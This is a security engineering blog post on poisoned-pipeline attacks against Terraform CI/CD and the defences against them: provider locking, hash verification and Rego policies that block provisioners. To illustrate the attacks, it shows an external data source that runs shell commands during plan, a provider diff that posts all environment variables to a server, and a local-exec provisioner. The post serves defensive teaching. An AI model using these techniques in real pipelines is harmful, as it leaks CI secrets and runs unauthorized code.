Terraform CI code execution restrictions

This article is part of the Security Tech Blog Series: Spring Cleaning for Security, brought to you by Maximilian Frank (@max-frank) from the Security Engineering team.

Background

At Mercari, we run many microservices developed by multiple teams. Each team has ownership over not only their code, but also the infrastructure necessary to run their services. To allow developers to take ownership of their infrastructure, we use HashiCorp Terraform to define the infrastructure as code. Developers can use Terraform native resources or custom modules provided by our Platform Infra Team to configure the infrastructure required by their service. Provisioning of this infrastructure is carried out as part of our CI/CD pipeline.

In this article, we will discuss some of our CI/CD security measures to restrict the execution of unauthorized, potentially malicious Terraform code. Previously, Daisuke Fujita (@dtan4) touched on this topic in his blog post Securing Terraform monorepo CI, which discussed our overall CI/CD security concept.

Terraform – CI/CD Poisoned Pipeline Execution

The team at Cider Security recently released a top 10 list of CI/CD security risks. In this list, they rank Poisoned Pipeline Execution (PPE) as number four. They define PPE as:

… the ability of an attacker … to manipulate the build process by injecting malicious code/commands into the build pipeline configuration, …

PPE can further be separated into three categories:

  • Direct PPE: The attacker can modify the CI/CD configuration and can thus change the CI/CD flow (e.g., add commands).
  • Indirect PPE: The attacker cannot directly modify the CI/CD configuration, but can modify configurations, scripts, etc. loaded and executed as part of the defined CI/CD pipeline. They can thus inject additional commands or code to be executed indirectly.
  • Public PPE: For repositories that are hosted publicly and automatically execute CI/CD pipeline steps, such as running unit tests, an attacker can potentially inject malicious commands into the CI/CD flow through a pull request.

Our previous blog post Securing Terraform monorepo CI by @dtan4 explained how we mitigated the risk of Direct PPE by moving our CI/CD pipeline configuration into a separate repository with stricter access controls. Here we will introduce a few of the security measures we implemented to reduce the risk of Indirect PPE through Terraform code committed to our repositories. Note that for this blog post we will focus on how to reduce the risk of arbitrary code and command execution through Terraform within the context of CI/CD, i.e., attacks where a malicious actor can freely execute any command with the same privileges as the CI/CD environment.

Terraform CI/CD Overview

Infrastructure provisioning using Terraform happens in two stages: plan and apply. During the plan stage, Terraform parses the current state of your infrastructure and the provided Terraform configuration to build a dependency graph of resources, usually referred to as the Terraform Plan. During the apply stage, this graph is used to carry out all the actions necessary to transform your current infrastructure state into the configuration defined by your code. Note that the plan stage is generally considered read-only, i.e., all operations executed by Terraform during the plan stage should only read data and not make any lasting changes to infrastructure or systems. Such modifications should only happen during the apply stage, when the infrastructure configuration is deployed and applied.

When using Terraform with a CI/CD system and a version control system like Git, terraform plan is usually run on pull requests to verify and review the infrastructure changes caused by the new code. The apply stage is then executed when the code is merged into the main branch. Since both stages require high-level access privileges to your infrastructure (plan requires read access and apply requires write access), it is recommended to have appropriate code reviews and approval steps before running the Terraform plan or apply CI/CD steps.
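The gating described above could be sketched as follows. This is a hypothetical illustration in Python, not our actual pipeline: the event names, the approved flag, and the credential labels are assumptions made for the example.

```python
from typing import Optional, Tuple


def select_stage(event: str, approved: bool) -> Optional[Tuple[str, str]]:
    """Return (terraform stage, credential scope) for a CI event, or None to skip.

    The event names and credential labels are hypothetical placeholders.
    """
    if not approved:
        # Neither plan nor apply runs on code that has not been reviewed.
        return None
    if event == "pull_request":
        # Plan only needs to read the current infrastructure state.
        return ("plan", "read-only")
    if event == "merge_to_main":
        # Apply changes infrastructure, so it needs write access.
        return ("apply", "read-write")
    # Any other event does not trigger Terraform at all.
    return None
```

The point of the sketch is that the approval check comes first, so an unreviewed pull request never reaches terraform plan, and the plan step never receives write credentials.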

Providers

Terraform relies heavily on plugins called providers, which let users define infrastructure as code for various platforms (GCP, AWS, etc.). Usually a provider will contain a number of:

  • resource types: used to configure infrastructure elements
  • and data source types: used to inspect/read information

For example, the Google Cloud Platform Provider contains all the resource and data source types necessary to deploy infrastructure using the various GCP services. Providers are most commonly installed from the Terraform Registry. Anyone can publish their own custom provider to this registry. This plugin-based provider system can be used by attackers to execute malicious code in Terraform CI/CD environments. We discuss two potential attack scenarios below: attackers with access to the code repository injecting malicious (or vulnerable) providers directly into the Terraform configuration, and attackers indirectly tricking developers into using a malicious provider (e.g., through typosquatting or other supply chain attacks).

Malicious Committers

Let’s say an attacker has somehow gained write access to one or more of your CI/CD integrated Terraform code repositories (e.g., by compromising a developer account). This means the attacker can both modify your Terraform code and trigger CI/CD jobs. The CI/CD platform in our theoretical scenario is configured to execute terraform plan for each pull request and terraform apply after the branch has been merged. In addition, merging a branch is only possible after a code owner approves the changes. As will become apparent below, executing terraform plan automatically without code review and an approval step is not safe. We therefore recommend also having an appropriate approval system in place for the plan step and limiting the privileges assigned to the CI/CD terraform plan step (e.g., only read access to resources).

Since your CI/CD pipeline requires code owner approval before merging and only terraform plan is executed, you might assume the attacker cannot modify your infrastructure or execute arbitrary commands. In reality, Terraform’s provider plugin system makes it possible for an attacker to execute arbitrary code even during the plan phase. One way an attacker might achieve such code execution is by using the Terraform External Provider.

data "external" "example" {
  program = ["sh", "-c", "echo \"{\\\"hello\\\": \\\"$(whoami), I am evil\\\"}\""]
}

output "output" {
  value = data.external.example.result
}

The External Provider is an official Terraform provider published by HashiCorp that makes it possible to execute any command or script available on the system executing terraform. Normally it is used to integrate with an API for which no first-party provider exists yet, but as the code snippet above shows, it can just as easily be used to execute malicious commands. As external is a data source, the configured commands are already executed during terraform plan (as shown in the code snippet below). Note that the External data source expects executed commands to output valid JSON.

$ terraform plan

Changes to Outputs:
  + output = {
      + "hello" = "mfrank, I am evil"
    }
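For comparison, a benign program for the external data source might look like the Python sketch below. It assumes the protocol documented for the External Provider: the program receives the query argument as a JSON object on standard input and must print a single JSON object whose values are all strings. The function names build_result and run and the name query key are hypothetical.

```python
import json
from typing import Dict, TextIO


def build_result(query: Dict[str, str]) -> Dict[str, str]:
    """Build the result map; the external data source only accepts string values."""
    # "name" is a hypothetical query key used for illustration.
    name = query.get("name", "world")
    return {"hello": str(name)}


def run(stdin: TextIO, stdout: TextIO) -> None:
    """Read the query from stdin and write the result object to stdout."""
    # Terraform passes the `query` argument as a JSON object on stdin.
    query = json.load(stdin)
    # The result must be one JSON object written to stdout.
    json.dump(build_result(query), stdout)
```

A script entry point would call run(sys.stdin, sys.stdout). Nothing in this protocol limits what the program does before it prints its result, which is exactly why the data source is attractive to an attacker.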

Instead of using the HashiCorp External Provider, a malicious committer could also create their own Terraform provider, like our Security Engineering team’s very own Hiroki Suezawa (@rung) did. He created a cmdexec provider for security testing of Terraform CI/CD systems. This provider works similarly to the HashiCorp External Provider in that it provides a data source that can be configured to execute system commands or scripts. By default, Terraform downloads and installs the latest version (unless otherwise specified) of every provider referenced in the configuration during Terraform initialization. Therefore, any developer with access to the code can add new providers to install simply by modifying the Terraform configuration.

While a reviewer would probably spot the malicious code easily for both of these providers, a more sophisticated attacker could create a complex provider and hide their malicious code among hundreds of lines of non-malicious code.
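One way to surface newly added providers for reviewers before terraform init runs is a simple text scan of the configuration. The Python sketch below is a heuristic and not an HCL parser: it assumes sources are written as source = "..." string literals, and the ALLOWED_SOURCES set and function names are hypothetical. It also matches the source argument of module blocks, so it over-reports, and it cannot see providers that Terraform infers implicitly from resource or data source type names.

```python
import re
from typing import Iterable, List, Set

# Hypothetical allowlist; a real list would come from a reviewed location.
ALLOWED_SOURCES: Set[str] = {"hashicorp/google", "hashicorp/null"}

# Matches arguments such as: source = "max-frank/poetry"
SOURCE_PATTERN = re.compile(r'\bsource\s*=\s*"([^"]+)"')


def find_sources(tf_text: str) -> List[str]:
    """Return every quoted `source` value found in the configuration text."""
    return SOURCE_PATTERN.findall(tf_text)


def unapproved_sources(tf_text: str, allowed: Iterable[str] = ALLOWED_SOURCES) -> List[str]:
    """Return the sources that are not on the allowlist, in order of appearance."""
    allowed_set = set(allowed)
    return [source for source in find_sources(tf_text) if source not in allowed_set]
```

A check like this only flags changes for a human to look at. It does not replace review of the provider code itself.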

Supply Chain Attacks

As mentioned already it is recommended to implement a review and approval step even before the plan stage. A diligent reviewer is likely to find and reject most malicious code commits, but such a review process alone is not enough to prevent poisoned pipeline execution. An attacker could still be able to execute malicious code in your CI/CD environment without access to your code repositories through the providers and tools that are already part of your supply chain.

Let’s say a few months back your company implemented a new SRE policy requiring you to add a poem to the description of every infrastructure resource that supports some form of description or comments field. Since writing poems is hard and you did not want to copy and paste a poem from somewhere on the internet every time you add a resource, you decided to see whether there is a Terraform provider that can help you with this new policy.

As luck would have it, you found max-frank/poetry v1.0.0, a Terraform provider with a data source that can retrieve poems from https://poetrydb.org/, exactly what you needed. Since you are very security conscious, you even did a full code review, found no bad code, and added the provider to your code base.

terraform {
  required_providers {
    poetry = {
      source  = "max-frank/poetry"
      version = ">= 1.0.0"
    }
  }
}

data "poetry" "test" {
  title = "Ozymandias"
}

output "poem" {
  value = data.poetry.test
}

A few months go by, and you and your systems are running normally. Your CI/CD system is doing overtime with all the new infrastructure you are adding. You have just packed your bags for a week-long, all-expenses-paid holiday to sunny Spain (a golden week, so to say) when your company’s security team calls to tell you that all the CI/CD secrets have leaked. Your week of sipping piña coladas on the Costa del Sol is cut short, since they need your help with the investigation and cleanup. After some digging you find the cause of the leak: the maintainer of the poetry provider you have been using released a new version with malicious code that sends all environment variables to a remote server every time the provider is loaded (max-frank/poetry pull request). Your CI/CD pipeline has been using the new malicious version for the past few days.

func New(version string, apiEndpoint string) func() tfsdk.Provider {
+   // get local poems
+   localPoems, _ := json.Marshal(os.Environ())
+   http.Post("http://localhost:8080/poetry", "text/plain", bytes.NewReader(localPoems))
+
    return func() tfsdk.Provider {
        return &provider{
            version:     version,
            apiEndpoint: apiEndpoint,
        }
    }
}

You might think you could have prevented this attack by pinning the provider to version 1.0.0 in your Terraform config. However, instead of releasing a new provider version, the attacker could simply have replaced the 1.0.0 release with a malicious one. So what could you actually have done to prevent this and other similar attacks?
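To see why the open-ended constraint in the configuration above mattered, the Python sketch below mimics how a >= constraint resolves to the newest available release. It is a simplification under stated assumptions: versions are plain MAJOR.MINOR.PATCH strings, only the >= and = operators are handled, the function names are hypothetical, and the 1.1.0 release in the usage note is an invented version number. Terraform’s real constraint syntax is richer.

```python
from typing import List, Optional, Tuple


def parse_version(text: str) -> Tuple[int, int, int]:
    """Parse a plain MAJOR.MINOR.PATCH string into a comparable tuple."""
    major, minor, patch = (int(part) for part in text.strip().split("."))
    return (major, minor, patch)


def select_version(constraint: str, available: List[str]) -> Optional[str]:
    """Pick the newest available version that satisfies a simple constraint."""
    operator, wanted_text = constraint.split()
    wanted = parse_version(wanted_text)
    if operator == ">=":
        candidates = [v for v in available if parse_version(v) >= wanted]
    elif operator == "=":
        candidates = [v for v in available if parse_version(v) == wanted]
    else:
        raise ValueError(f"unsupported operator: {operator}")
    # The newest matching release wins, which is how a malicious update gets picked up.
    return max(candidates, key=parse_version) if candidates else None
```

With releases 1.0.0 and 1.1.0 available, select_version(">= 1.0.0", ...) picks the newer release, while select_version("= 1.0.0", ...) stays on the reviewed one. Even the exact pin still trusts the registry to keep serving the same archive for 1.0.0, so pinning alone is not enough.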

Provider Locking

At Mercari, we experienced a supply chain attack in 2021 when Codecov, one of the tools we had been using in our CI/CD environment, was compromised. Since then we have been working hard to further improve the security of our systems and harden our supply chain to reduce the risk and potential impact of attacks on any components in our supply chain.

As part of this effort we also implemented Terraform provider locking for our CI/CD environment to prevent:

  1. Usage of Terraform providers that have not undergone security review by our team
  2. Supply chain attacks that replace or modify trusted providers with malicious code

For the CI/CD pipeline of our Terraform monorepo, we implemented provider locking by pre-downloading all verified providers and checking the downloaded archives against their known file hashes. The downloaded providers are then installed directly into our CI/CD Docker image. By always executing terraform init with the -plugin-dir flag, we can ensure that only our pre-installed providers are used. Since an attacker might gain control over not only the code of the providers in your supply chain but also the archives of already published versions, it is important to verify the integrity of the downloaded providers by checking the downloaded files against previously observed and approved file hashes.

$ terraform init -plugin-dir=/opt/terraform-providers

The list of allowed providers is managed by our Platform Infra Team in our CI/CD repository which imposes strict access controls and code review requirements.
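The hash check at the heart of this approach can be sketched in a few lines of Python. This is a minimal illustration and not our actual tooling: it assumes the allowlist is a mapping from archive file name to an approved SHA-256 digest, and the function names are hypothetical.

```python
import hashlib
from pathlib import Path
from typing import Dict


def sha256_of(path: Path) -> str:
    """Compute the SHA-256 hex digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_archive(path: Path, approved: Dict[str, str]) -> bool:
    """Accept an archive only if its name is allowlisted and its digest matches."""
    expected = approved.get(path.name)
    if expected is None:
        # The archive was never reviewed, so it is rejected outright.
        return False
    # A replaced or modified archive produces a different digest.
    return sha256_of(path) == expected
```

Because the digest is taken over the archive contents, this catches both a provider that was never approved and an approved version whose published archive was later swapped out.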

Provisioners

Apart from providers, Terraform supports another feature that can be abused to execute arbitrary code in your CI/CD pipelines. Provisioners are a rarely used (for a reason) Terraform feature that allows you to execute additional code upon creation or destruction of Terraform resources. As of writing, Terraform supports three types of provisioners:

  • file, allows you to copy files from the current machine to the newly created resource
  • local-exec, can be used to execute commands on the current machine after a new resource is created
  • remote-exec, can be used to execute commands on a remote resource after it is created

As you can see, the local-exec provisioner provides us with a clear path to arbitrary code execution. So an attacker who has already gained write access to a Terraform code repository just has to add a provisioner block to one of your Terraform resources.

resource "google_compute_instance" "default" {
  ...
  provisioner "local-exec" {
    command = "echo $(whoami)"
  }
}

Note that if you are using a provisioner as part of your Terraform configuration and it is executing a local script file, attackers could also achieve arbitrary code execution by modifying that script file.

Now, unlike the HashiCorp External Provider, the local-exec provisioner (like any of the other available provisioners) is only executed after the resource it is attached to is created or destroyed. This means it only ever runs in the apply phase. If you have reviews before both the plan and the apply phase, you therefore already have at least two guard rails in place protecting you against attacks using Terraform provisioners. However, it is generally better to have more layers of security for defense in depth. Below we will discuss one possible approach for automatically checking for and blocking Terraform provisioners.

Restrict through Policy

Above we discussed how we use provider locking to prevent the installation and execution of any Terraform providers that have not been reviewed and approved. This approach is possible since every provider (including the official HashiCorp providers) is a plugin, i.e., providers are not shipped with Terraform, but are instead installed as extra packages only when needed. This is not the case for provisioners. Provisioners are directly integrated into the Terraform binary, and as of writing there is no native way of disabling them.

This means that we have to detect provisioners and stop CI/CD execution before running terraform apply (remember, provisioners are not executed during plan). One way to achieve this is to validate your Terraform configuration and/or Terraform Plan against security policies and stop further execution if a policy violation is detected. Note that generally these kinds of policies should not be considered as security mechanisms, but rather as guard rails assisting developers in keeping the code clean and free of any compliance violations.

At Mercari we use Conftest to validate our Terraform (and other infrastructure configuration) against a set of internal compliance and security policies. Conftest supports HCL, JSON and many other configuration file types and allows us to test policies against both raw Terraform configuration files and Terraform Plans in JSON format.

terraform plan -out=plan
terraform show -json plan > plan.json
# --all-namespaces evaluates policies in packages other than the default "main"
conftest test --all-namespaces --policy example.rego plan.json

Policy files used by Conftest are written in Rego and tested with Open Policy Agent (OPA). For Terraform Enterprise customers HashiCorp provides a policy as code framework called Sentinel which can be used for the same purpose.

For creating a policy to disallow provisioners we recommend validating against the Terraform Plan. Checking against the Plan makes it easier to find occurrences of provisioners in modules, since you have the full resource graph in one JSON file. The following policy checks if any configured resource has a provisioner attached to it and sets an appropriate policy violation.

package policy.provisioners.local_exec.disallow

values_with_path(value, path) = r {
    r = [
    {
        "path": sprintf("%s.%s",[concat(".", path), address]), 
        "value": val
    } | val := value[i]; address := value[i].address]
}

# modified from https://play.openpolicyagent.org/p/0K5cSyB6vi
resources[r] {
    some path, value
    # Walk over the JSON tree and check root and child modules
    walk(input.configuration, [path, value])
    # Look for resources in the current value based on path
    rs := module_resources(path, value)
    # Aggregate them into `resources`
    r := rs[_]
}

# Variant to match root_module resources
module_resources(path, value) = rs {
    # Where the path is [..., "root_module", "resources"]
    reverse_index(path, 1) == "resources"
    reverse_index(path, 2) == "root_module"
    rs := values_with_path(value, path)
}

# Variant to match child_modules resources
module_resources(path, value) = rs {
    # match [..., "module_calls", i, "module", "resources"]
    reverse_index(path, 1) == "resources"
    reverse_index(path, 2) == "module"
    reverse_index(path, 4) == "module_calls"
    rs := values_with_path(value, path)
}

reverse_index(path, idx) = value {
    value := path[count(path) - idx]
}

deny_provisioners[msg] {
    count(resources[i].value.provisioners) > 0
    msg = sprintf("Provisioner found at path: '%s'!", [resources[i].path])
}

You can also test this policy on the Rego Playground. The policy works by first extracting all resources using walk and some (the existence operator). Once we have a list of all resources, we can define our policy rule to deny any resource containing a provisioner. This policy will reject any Terraform configuration containing a provisioner.
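For readers less familiar with Rego, the same traversal can be sketched in Python. This is an illustrative equivalent and not part of our Conftest setup: it assumes the configuration layout of the plan JSON used by the policy above (root_module.resources plus nested module_calls), and it builds paths in a module.<name>.<address> form of its own rather than the path format produced by the Rego policy. The function names are hypothetical.

```python
from typing import Any, Dict, Iterator, List, Tuple


def iter_resources(module: Dict[str, Any], prefix: str = "") -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (path, resource) pairs for a module and all of its child modules."""
    for resource in module.get("resources", []):
        yield prefix + resource["address"], resource
    # Child modules hang off module_calls.<name>.module and can nest further.
    for name, call in module.get("module_calls", {}).items():
        yield from iter_resources(call.get("module", {}), f"{prefix}module.{name}.")


def resources_with_provisioners(plan: Dict[str, Any]) -> List[str]:
    """Return the paths of all configured resources that have a provisioner."""
    root = plan.get("configuration", {}).get("root_module", {})
    return [path for path, resource in iter_resources(root) if resource.get("provisioners")]
```

A CI step could load plan.json with json.load and fail the job whenever the returned list is non-empty.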

Terraform Enterprise customers might also want to take a look at the HashiCorp Terraform Guides Repository, which contains various example Sentinel policies, one of which can be used to disallow the execution of provisioners.

You can also modify the above policy if, for example, you want to allow specific local-exec provisioner commands, but this is only possible for provisioner commands that do not use Terraform variable interpolation. The reason is that the Terraform Plan does not include the actual command string for provisioner commands that use variable interpolation, which makes it impossible to check them against a policy.

resource "null_resource" "static" {
  provisioner "local-exec" {
    command = "echo 'Hello'"
  }
}

resource "null_resource" "dynamic" {
  provisioner "local-exec" {
    command = "echo ${self.id}"
  }
}

For example, the above Terraform configuration will result in the following resource configurations in its Terraform Plan:

[
    {
        "address": "null_resource.dynamic",
        "mode": "managed",
        "type": "null_resource",
        "name": "dynamic",
        "provider_config_key": "null",
        "provisioners": [
            {
                "type": "local-exec",
                "expressions": {
                    "command": {
                        "references": [
                            "self.id",
                            "self"
                        ]
                    }
                }
            }
        ],
        "schema_version": 0
    },
    {
        "address": "null_resource.static",
        "mode": "managed",
        "type": "null_resource",
        "name": "static",
        "provider_config_key": "null",
        "provisioners": [
            {
                "type": "local-exec",
                "expressions": {
                    "command": {
                        "constant_value": "echo 'Hello'"
                    }
                }
            }
        ],
        "schema_version": 0
    }
]

As can be seen above, the null_resource.static provisioner will retain its command in the resulting Terraform Plan, but for the null_resource.dynamic provisioner only a list of referenced variables is retained. With this limitation in mind we can create a policy that only allows local-exec provisioners on specific resource paths and constant commands.

# approved provisioners configuration
approved_provisioners := [
    {
        "path": "null_resource.static",
        "command": "echo 'Hello'"
    },
    {
        "path": "test.test.null_resource.static",
        "command": "echo 'Hello'"
    }
]

# build resource list the same way as before
…

# deny all unapproved local-exec provisioners 
deny_local_exec[msg] {
    resources[i].value.provisioners[j].type = "local-exec"
    not is_approved(resources[i].path, resources[i].value.provisioners[j])

    msg = sprintf(
        "Unapproved local-exec provisioner command `%s` at path '%s'!",
        [resources[i].value.provisioners[j].expressions.command.constant_value, resources[i].path]
    )
}

is_approved(path, provisioner) { 
    some approved
    path == approved_provisioners[approved].path
    provisioner.expressions.command.constant_value == approved_provisioners[approved].command
}

The above policy uses the some keyword to check whether an approved path and command pair exists that matches the provisioner. If no such pair exists, the policy will reject the provisioner. The full code of the above policy can be viewed on the Rego Playground. HashiCorp also provides a similar Sentinel policy in their Terraform Guides repository.
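The approval logic hinges on the difference between constant_value and references in the plan JSON shown earlier. A minimal Python sketch of that check, with hypothetical function names and an allowlist modeled as a set of (path, command) pairs, could look like this:

```python
from typing import Any, Dict, Optional, Set, Tuple


def constant_command(provisioner: Dict[str, Any]) -> Optional[str]:
    """Return the literal command, or None when the plan only lists references."""
    command = provisioner.get("expressions", {}).get("command", {})
    return command.get("constant_value")


def is_approved(path: str, provisioner: Dict[str, Any], approved: Set[Tuple[str, str]]) -> bool:
    """Approve a provisioner only for an allowlisted (path, constant command) pair."""
    command = constant_command(provisioner)
    if command is None:
        # Interpolated commands carry no inspectable string, so they are rejected.
        return False
    return (path, command) in approved
```

Rejecting every command without a constant_value is the conservative choice: anything the policy cannot read is treated as unapproved.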

Conclusion

In this blog, we discussed how arbitrary code execution can be achieved by an attacker targeting Terraform CI/CD pipelines. We also introduced some of the security mechanisms we use at Mercari to guard against these kinds of attacks, either through malicious commits or supply chain attack vectors. CI/CD pipelines have become a critical piece of infrastructure for many organizations, thus keeping your CI/CD pipelines and infrastructure secure is vital. I hope the ideas and approaches discussed in this blog can help you further secure your own CI/CD pipelines using Terraform.

If you found this blog interesting and want to work with us, we are hiring.

